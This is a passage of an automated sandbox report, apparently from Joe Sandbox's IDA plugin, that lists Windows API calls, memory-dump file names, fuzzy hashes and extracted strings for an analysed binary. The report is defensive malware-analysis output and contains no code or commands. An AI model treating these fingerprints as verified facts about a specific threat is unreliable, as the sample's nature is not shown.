                    • Opcode ID: ed21ec9c400686654b7c8d6228ded7c3ff3f68ee4ec8bba2e3c6275c00253205
                    • Instruction ID: 9c2614a48a71e7752fb2d6b973f754b5cd82ddcb035724aff6ea95deae156d33
                    • Opcode Fuzzy Hash: ed21ec9c400686654b7c8d6228ded7c3ff3f68ee4ec8bba2e3c6275c00253205
                    • Instruction Fuzzy Hash: 89E03931142228BADB201BA2EC0CED73F2DEF167A1F008029F90894060C6798540CBE5
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00742231
                    • SetTextColor.GDI32(?,000000FF), ref: 0074223B
                    • SetBkMode.GDI32(?,00000001), ref: 00742250
                    • GetStockObject.GDI32(00000005), ref: 00742258
                    • GetWindowDC.USER32(?,00000000), ref: 0077C0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0077C0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 0077C0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 0077C112
                    • GetPixel.GDI32(00000000,?,?), ref: 0077C132
                    • ReleaseDC.USER32(?,00000000), ref: 0077C13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: c7d5624d19990824bfa199254b4fe965f5834790fba69f9c566e470b24da9265
                    • Instruction ID: 38e4ee7ac2a5822900d64f1e102f22eeff128838af845a970621a7e425d450f7
                    • Opcode Fuzzy Hash: c7d5624d19990824bfa199254b4fe965f5834790fba69f9c566e470b24da9265
                    • Instruction Fuzzy Hash: 30E03932200648EFDF215F68FC09BD83B11AB05332F04C36AFA69880E187794990DB11
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00798C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0079882E), ref: 00798C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0079882E), ref: 00798C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0079882E), ref: 00798C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 3aec29adbe43c5176921c26f765fceb1ee9ccd0d4ec30f7da7d50246bac00c4a
                    • Instruction ID: 15990e1180760ff114643c5f4e8703a680d183b2922dfa07465d10c7aee78205
                    • Opcode Fuzzy Hash: 3aec29adbe43c5176921c26f765fceb1ee9ccd0d4ec30f7da7d50246bac00c4a
                    • Instruction Fuzzy Hash: 21E08676642211EBDB605FB06E0CF563BADFF52B92F04886CF645C9040DA3C8485CB75
                    APIs
                    • GetDesktopWindow.USER32 ref: 00782187
                    • GetDC.USER32(00000000), ref: 00782191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007821B1
                    • ReleaseDC.USER32(?), ref: 007821D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: ed85c289937750f5177b46f7d94c7880a5c88a651b9bbe235d34a4c94f34c689
                    • Instruction ID: f563002d66813fb2c2ca4ae3b7811a77364d8e058555c3e641962d0e848c09d4
                    • Opcode Fuzzy Hash: ed85c289937750f5177b46f7d94c7880a5c88a651b9bbe235d34a4c94f34c689
                    • Instruction Fuzzy Hash: 52E0E5B5800204EFDB41AF60C808A9D7BB2EB4C351F10C429F95AA7260CB3C91429F45
                    APIs
                    • GetDesktopWindow.USER32 ref: 0078219B
                    • GetDC.USER32(00000000), ref: 007821A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007821B1
                    • ReleaseDC.USER32(?), ref: 007821D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: bae3948be7e5f9842c8309e8c501c369adb441c896f7488894b5c0f676af3612
                    • Instruction ID: b3f9088a407c9652a06f3b5b48a3e634876884a08233c1db840fa0259e9e7347
                    • Opcode Fuzzy Hash: bae3948be7e5f9842c8309e8c501c369adb441c896f7488894b5c0f676af3612
                    • Instruction Fuzzy Hash: 8DE0EEB5800204AFCB02AFA0C808A9EBBA2AB4C310F10C029F95AA7220CB3C91419F44
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID: %}
                    • API String ID: 0-578177530
                    • Opcode ID: 683fec01f589d40f29d57935da48b5727ac21f62f1a25cfd51a90ac6595488e3
                    • Instruction ID: 58b313f4371829cc0282a28cdeb8cc536c91f21f8f576456cf0b20fa73af0ac3
                    • Opcode Fuzzy Hash: 683fec01f589d40f29d57935da48b5727ac21f62f1a25cfd51a90ac6595488e3
                    • Instruction Fuzzy Hash: 6CB1C271900109DBCF14EF98C4859FEB7B9FF45310F50402AE902A7195EB3C9E95CB52
                    APIs
                      • Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • __wcsnicmp.LIBCMT ref: 007AB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007AB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: b439b76d506ce5b6d9684646728f3ddcccd65b500b91d7ccd42f449ba005f65d
                    • Instruction ID: 73cfa4bfe43c9a75ae0386ca872b01ee5a18d5d87e161c73f52607b2de021a5b
                    • Opcode Fuzzy Hash: b439b76d506ce5b6d9684646728f3ddcccd65b500b91d7ccd42f449ba005f65d
                    • Instruction Fuzzy Hash: B8618375A00215EFCF14DF94C885EAEB7B4EF89310F11415AF946AB392DB78AE40CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oau
                    • API String ID: 4104443479-3624848570
                    • Opcode ID: 0cb0f0db11054e2ef1a25a6634b9cc9a7bbfb2228f2dd9c558145c0cf982c16f
                    • Instruction ID: 8d0b043b900c28658641e4f1f58e796542d9f0a48174bf39759b6d84d10e66d5
                    • Opcode Fuzzy Hash: 0cb0f0db11054e2ef1a25a6634b9cc9a7bbfb2228f2dd9c558145c0cf982c16f
                    • Instruction Fuzzy Hash: 6B5181B0900609DFCF64DF68C884AAEBBF1FF44314F54852AE85AD7240EB38AD95CB51
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00752AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00752AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 6c2b8de98cc6e09a47519edb783d0c2f832ffd212c87b7ae5bfbecec8bdd08a7
                    • Instruction ID: 4d3d196b5aed21c650c5b1fff227cc3ccd3bf0a8068bc88bf487e350f0ef27b3
                    • Opcode Fuzzy Hash: 6c2b8de98cc6e09a47519edb783d0c2f832ffd212c87b7ae5bfbecec8bdd08a7
                    • Instruction Fuzzy Hash: E9514771518745DBD320AF10DC8ABAFBBE8FF84310F42885DF2D9511A1DB388529CB66
                    APIs
                      • Part of subcall function 0074506B: __fread_nolock.LIBCMT ref: 00745089
                    • _wcscmp.LIBCMT ref: 007A9AAE
                    • _wcscmp.LIBCMT ref: 007A9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: ff42affdcc5172339f54fb8d01c42819b31cb852b0a9ba8a7f475e9ad2a35a69
                    • Instruction ID: 302021744a228ca6f4d217ae94de94467c2755b52a8657456033133e4ea94255
                    • Opcode Fuzzy Hash: ff42affdcc5172339f54fb8d01c42819b31cb852b0a9ba8a7f475e9ad2a35a69
                    • Instruction Fuzzy Hash: CA41D6B1A00619FBDF209AA4DC49FEFB7B9DF86710F000179BA00A7191DB799A1487A1
                    APIs
                    • _memset.LIBCMT ref: 007B2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007B28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 216ad117c6b02ad04f8fb0801a591d77b0778c3e9631c64ff201508300ad26e2
                    • Instruction ID: 25524aa2210ee989a574185b19b75a5a7b06e8385aa3a023ea2361289559a874
                    • Opcode Fuzzy Hash: 216ad117c6b02ad04f8fb0801a591d77b0778c3e9631c64ff201508300ad26e2
                    • Instruction Fuzzy Hash: 29311971801119EFCF05AFA1CC89EEEBFB9FF08350F104029F815A6166EB355A56DBA0
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 007C6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: e58e700ec4db0191a739fd4d8d1a61f080dbce8c19880c62c1dd690b1912f824
                    • Instruction ID: 7e14b4b0267c15fd40e10c0e42da1f5b0193e10950dce603371e971385a410c7
                    • Opcode Fuzzy Hash: e58e700ec4db0191a739fd4d8d1a61f080dbce8c19880c62c1dd690b1912f824
                    • Instruction Fuzzy Hash: 35317C71200604AADF109F68CC85FFB77A9FF48724F10861DF9A697190DB39AC91DBA4
                    APIs
                    • _memset.LIBCMT ref: 007A2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 185a59cb75f5f2bc2cbf138fea1ad5f3148b118cb26bfb10c6dd78bb5d8fb962
                    • Instruction ID: faf22fcb35aefbde217461f844a72b31a91c7db6424c88669c6b1d0e5f05ff5e
                    • Opcode Fuzzy Hash: 185a59cb75f5f2bc2cbf138fea1ad5f3148b118cb26bfb10c6dd78bb5d8fb962
                    • Instruction Fuzzy Hash: 2B31F731604305EBEB248F4CC849B9EBBB5FF86300F244229ED85D61A2E7789986CB50
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 9cb1e094cc964463c6e70234c1354880eeceeddcbea8278fb647f20c4a90b18b
                    • Instruction ID: 969d43925c136413a9d11df489fe2fdbf913a5049d12f5c89e44c73bf90b6c70
                    • Opcode Fuzzy Hash: 9cb1e094cc964463c6e70234c1354880eeceeddcbea8278fb647f20c4a90b18b
                    • Instruction Fuzzy Hash: 7011B271700208AFEF119E14CCC0FBB37AAEB893A4F11422DF95897290D679AC9187A0
                    APIs
                      • Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
                      • Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
                      • Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91
                    • GetWindowRect.USER32(00000000,?), ref: 007C6EE0
                    • GetSysColor.USER32(00000012), ref: 007C6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 1f707aa71da0a5a01270df32f24ed715ee88264249b7fc991987d2f0dbcd6fa6
                    • Instruction ID: bdd8f5d119ed2b13250c27c2bc048b8e0b2718af21af1e6ea225d2932188ba50
                    • Opcode Fuzzy Hash: 1f707aa71da0a5a01270df32f24ed715ee88264249b7fc991987d2f0dbcd6fa6
                    • Instruction Fuzzy Hash: 7421F972610209AFDB04DFA8DD45EFA7BB9FB08314F04462DF955D3250E739E8619B50
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 007C6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007C6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: dfa2e3423d384a68e8a41fb3d2ad1dfb47412da44e33eb58e478e092a103986e
                    • Instruction ID: e5ca15351fcbac5fd3296b609a3635c3cd027702d4a3e14efb9cab391fe401c4
                    • Opcode Fuzzy Hash: dfa2e3423d384a68e8a41fb3d2ad1dfb47412da44e33eb58e478e092a103986e
                    • Instruction Fuzzy Hash: C4116DB1500108ABEB105E649C85FEA376AEB05378F60472CF965D71D0C779EC919B60
                    APIs
                    • _memset.LIBCMT ref: 007A2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007A2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 2c4cb21b07f76021e0bdc3bcfd5bc198da67efca4282892ba733b8bd45135c4d
                    • Instruction ID: 6015b2c349a5fbf514f1745ad80823f8d09f36882385a33e4f9ab6513b017807
                    • Opcode Fuzzy Hash: 2c4cb21b07f76021e0bdc3bcfd5bc198da67efca4282892ba733b8bd45135c4d
                    • Instruction Fuzzy Hash: 6F11E636905114EFCB20DB5CDC08F9973B9EB86310F0842B5EC54A72A2D778AD16C791
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007B2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007B2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
